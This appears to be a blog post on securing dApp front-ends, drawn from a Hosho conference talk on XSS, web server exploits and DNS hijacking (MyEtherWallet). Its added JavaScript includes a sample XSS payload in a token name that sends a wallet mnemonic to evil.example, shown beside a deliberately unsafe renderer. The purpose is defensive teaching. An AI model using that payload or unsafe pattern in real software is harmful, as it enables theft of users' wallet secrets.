Last week we had the pleasure of attending a cybersecurity & blockchain conference hosted by Hosho called Hoshocon. What is Hosho? It is a smart contract auditing company which offers a variety of services focused on protecting your decentralized applications ( dApps ). An interesting fact about the word HOSHO: it means a “Sense of Security” in Japanese. As you can tell, Hosho is squarely focused on security within the blockchain ecosystem, an important aspect given how many hacks we’ve seen recently against exchanges & dApps. So how do you protect your dApps from being compromised? Jay Schwerberg, Director of Engineering at Hosho, shared his insights. Mr. Schwerberg is a seasoned cybersecurity veteran with extensive experience in the lotto & gaming industry.
Security is focused on Smart Contracts, but what about your front-end / web-app?
The truth is that most companies are heavily focused on securing their smart contracts. However, it is just as important to secure your front-end or web-app, which is what users actually load and which talks to your smart contracts & back-end on their behalf. Let’s take a look at some of the hidden points of attack that Mr. Schwerberg highlighted during his presentation.
Hidden Points of Attack
We’ll cover the following areas that have been exploited in the past and could have been avoided by a few simple updates. It is important to remember that your front-end is a conventional web property: it depends on DNS, a web server and an operating system that sit entirely outside your smart contracts, so an audit of the contracts says nothing about the security of the page your users load.
- XSS ( Cross-site scripting ) Attacks
- Web Server Exploits
- OS Exploits
- DNS Hijacking
What are Cross-site Scripting (XSS) Attacks & How To Prevent Them
As defined by OWASP, Cross-Site Scripting ( XSS ) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. They are common wherever a web-application includes user-supplied input in its output without validating or encoding it.
Protecting Against XSS Attacks
Luckily, developers have access to a variety of useful information on the web that can help guide them in securing their decentralized applications. Here are some tips to help you protect your dApp.
- Deny all untrusted data by default: only insert it into HTML contexts you have an encoder for (OWASP rule #0), and treat data read back from the chain, such as token names and event fields, as untrusted too
- Validate user input against an allowlist and encode it for the context it is rendered in (HTML body, attribute, JavaScript, URL)
- Implement a Content Security Policy ( CSP ) as a backstop against encoding mistakes; note that Cross-origin Resource Sharing ( CORS ) only governs which origins may read your responses and does not stop injected script
- Use strong TLS configuration so that scripts cannot be injected into your pages in transit
To read more about the available prevention methods for XSS attacks, check out this useful resource by OWASP. XSS ( Cross Site Scripting ) Prevention Cheatsheet
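As an added example (not code from Hosho or from the talk), here is how those rules look in a dApp front-end that renders a token list: the vulnerable renderer beside its encoded form, an allowlist check for addresses, and a CSP value that backstops the encoding. The token payload, host names and function names are constructed for illustration; it runs under Node with no DOM.

```javascript
// Added example: rendering chain data in a dApp front-end. Token names, ENS
// labels and event payloads are attacker-controlled, so they are treated
// exactly like form input. Runs under Node, no DOM required.

// Constructed sample: a token whose on-chain name() returns an XSS payload.
const MALICIOUS_TOKEN = {
  address: "0x1111111111111111111111111111111111111111",
  name: '<img src=x onerror="fetch(`https://evil.example/?k=`+localStorage.mnemonic)">',
  balance: "42.0",
};

// Vulnerable: the name is interpolated straight into HTML, so the payload
// above becomes a live <img onerror=...> element in the user's page.
function renderTokenRowUnsafe(token) {
  return `<tr><td>${token.name}</td><td>${token.balance}</td></tr>`;
}

// HTML entity encoding for the element-content and attribute-value contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Allowlist validation ("deny all" by default): a field that must be an
// address is rejected unless it matches the address grammar exactly.
function isValidAddress(value) {
  return /^0x[0-9a-fA-F]{40}$/.test(value);
}

// Hardened: validate what can be validated, encode what must be displayed.
function renderTokenRowSafe(token) {
  if (!isValidAddress(token.address)) throw new Error("invalid token address");
  const balance = Number(token.balance);
  if (!Number.isFinite(balance)) throw new Error("invalid balance");
  return `<tr><td>${escapeHtml(token.name)}</td><td>${balance.toFixed(4)}</td></tr>`;
}

// A Content-Security-Policy that limits the damage of an encoding mistake:
// scripts only from the page's own origin, no inline script, and network
// access only to the dApp's own API and RPC node (hypothetical hosts).
// CORS is deliberately absent here: it controls which origins may *read*
// responses and does nothing to stop injected script from running.
function contentSecurityPolicy() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'none'",
    "connect-src 'self' https://api.example-dapp.invalid https://rpc.example-node.invalid",
    "frame-ancestors 'none'",
  ].join("; ");
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", renderTokenRowUnsafe(MALICIOUS_TOKEN));
  console.log("safe:  ", renderTokenRowSafe(MALICIOUS_TOKEN));
  console.log("CSP:   ", contentSecurityPolicy());
}
```

The encoder is for HTML contexts only; a value placed inside a script block or a URL needs the encoder for that context, which is exactly what the OWASP cheat sheet enumerates.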
Taking a Look Into Web Server Exploits & Operating System Exploits
One of the most common attacks against web servers over the years has been the Denial of Service attack. However, there are a few more classes of exploit we’ll have to consider:
- Directory Traversal
- Misconfiguration Attacks
- Malicious Links & Redirects
Directory traversal is a vulnerability where an attacker supplies a path containing sequences such as ../ and is able to reach files outside the web root directory, such as configuration files, private keys or backups. Where the application also writes or includes files, the same flaw can escalate to executing OS (Operating System) commands, which exposes sensitive information and restricted directories.
Misconfiguration attacks arise when unnecessary services are enabled, default configuration files are left in place, or verbose error information is not masked; an attacker can then compromise the web server through attacks such as password cracking, error-based SQL injection and command injection.
Malicious links and redirects: an attacker may send the victim an email containing a link that looks authentic but leads, directly or via a redirect on the legitimate site, to a malicious web page that steals their data.
Protecting Against DNS Hijacking or What MyEtherWallet Could Have Done to Prevent The Hack
As we saw earlier in the year, the popular Ethereum wallet known as MyEtherWallet was compromised by a DNS hijacking attack. Attackers hijacked the routes to the DNS provider serving the domain (a BGP hijack of Amazon Route 53 address space), so lookups for the site returned attacker-controlled servers that served a phishing copy of the wallet. The rogue site presented an untrusted certificate, and users who clicked through the browser warning and unlocked their wallets had their keys stolen. According to Jay Schwerberg, this costly attack could have been avoided by using a few simple updates. Here’s what Mr. Schwerberg recommended:
- DNS Security Extensions ( DNSSEC ), so that validating resolvers reject forged answers for your domain
- Certificate Pinning ( note that browsers have deprecated HTTP Public Key Pinning, so pinning is mainly practical in native and mobile clients )
- HSTS ( HTTP Strict Transport Security ), which makes the certificate warning a hard failure that users cannot click through
- Content Security Policy ( CSP )
What is HTTP Strict Transport Security ( HSTS )?
The best definition of HSTS is provided by GlobalSign, an SSL & Digital Certificate provider which specializes in protecting your websites at the domain level.
HTTP Strict Transport Security (HSTS) is a web server directive that informs user agents and web browsers how to handle its connection through a response header sent at the very beginning and back to the browser. This sets the Strict-Transport-Security policy field parameter. It forces those connections over HTTPS encryption, disregarding any script’s call to load any resource in that domain over HTTP. HSTS is but one arrow in a bundled sheaf of security settings for your web server or your web hosting service. GlobalSign – https://www.globalsign.com/en/blog/what-is-hsts-and-how-do-i-use-it/
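To make that definition concrete, here is an added example (not from GlobalSign, Hosho or the talk) of the two halves of HSTS: the header a wallet front-end should send, and a minimal model of how a browser parses, stores and applies it, including expiry, includeSubDomains and the rule that a policy received over plain HTTP is ignored. The host names are hypothetical; it runs under Node with no network access.

```javascript
// Added example: a minimal model of a browser's HSTS store (RFC 6797) plus
// the header a server should send. Hostnames are hypothetical.

// The header a wallet front-end should send once every subdomain is on
// HTTPS: one year, subdomains included, eligible for the browser preload list.
const RECOMMENDED_HSTS = "max-age=31536000; includeSubDomains; preload";

// Parse a Strict-Transport-Security value into { maxAge, includeSubDomains, preload }.
// Returns null when the header is malformed, in which case browsers ignore it.
function parseHsts(header) {
  const policy = { maxAge: null, includeSubDomains: false, preload: false };
  for (const raw of header.split(";")) {
    const [name, value] = raw.trim().split("=").map((s) => (s === undefined ? s : s.trim()));
    switch ((name || "").toLowerCase()) {
      case "max-age":
        if (!/^\d+$/.test(value || "")) return null;
        policy.maxAge = Number(value);
        break;
      case "includesubdomains": policy.includeSubDomains = true; break;
      case "preload": policy.preload = true; break;
      default: break;   // empty or unknown directives are ignored
    }
  }
  return policy.maxAge === null ? null : policy;
}

// Record a policy for a host, as a browser does after an HTTPS response.
// A header received over plain HTTP is ignored, which is why the first
// visit must already be HTTPS (or the domain must be on the preload list).
function recordHsts(store, host, header, receivedOverHttps, nowMs) {
  if (!receivedOverHttps) return false;
  const policy = parseHsts(header);
  if (!policy) return false;
  if (policy.maxAge === 0) { delete store[host]; return true; } // max-age=0 clears the policy
  store[host] = { expires: nowMs + policy.maxAge * 1000, includeSubDomains: policy.includeSubDomains };
  return true;
}

// Decide whether an http:// URL for `host` must be rewritten to https://.
// While this returns true the browser also refuses to let the user click
// through a certificate error for that host, which is the property that
// would have stopped the MyEtherWallet phishing page from being usable.
function mustUpgrade(store, host, nowMs) {
  const labels = host.toLowerCase().split(".");
  for (let i = 0; i < labels.length; i++) {
    const entry = store[labels.slice(i).join(".")];
    if (!entry || entry.expires <= nowMs) continue;   // no policy, or expired
    if (i === 0 || entry.includeSubDomains) return true;
  }
  return false;
}

if (typeof require !== "undefined" && require.main === module) {
  const store = {};
  const now = Date.now();
  recordHsts(store, "wallet.example", RECOMMENDED_HSTS, true, now);
  console.log("wallet.example ->", mustUpgrade(store, "wallet.example", now));
  console.log("api.wallet.example ->", mustUpgrade(store, "api.wallet.example", now));
  console.log("other.example ->", mustUpgrade(store, "other.example", now));
}
```

The model shows why the recommended value matters: without includeSubDomains an attacker who controls DNS can still serve a plain-HTTP phishing page on an unpinned subdomain, and with a short max-age the protection lapses between visits.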
Final Thoughts on dApp Protection
From XSS attacks to DNS hijacking, there is a lot to consider when securing your decentralized applications. Security is a very important pillar of software development, but it often gets overlooked because of deadlines and requirements from upper management. There are great resources out there to help you protect your dApp from being compromised, but if you would like a professional opinion on your security implementation, feel free to contact Hosho or Jay Schwerberg directly. Contact information is included below.
Is there anything we missed? Let us know in the comments below. We’d love to hear about how you’re protecting your dApps from unwanted intruders.
HOSHO ( Smart Contract Auditing & Blockchain Security Services ) – https://hosho.io/contact
Jay Schwerberg – Director of Engineering | Hosho Twitter: @jschwerberg Email: firstname.lastname@example.org
Disclaimer: CryptoCanucks.com is not intended to provide tax, legal or investment advice, and nothing on CryptoCanucks.com should be construed as an offer to sell, a solicitation of an offer to buy, or a recommendation for any asset by CryptoCanucks.com or any third party. You alone are solely responsible for determining whether any investment, asset or strategy, or any other product or service, is appropriate or suitable for you based on your investment objectives and personal and financial situation. You should consult an attorney or tax professional regarding your specific legal or tax situation.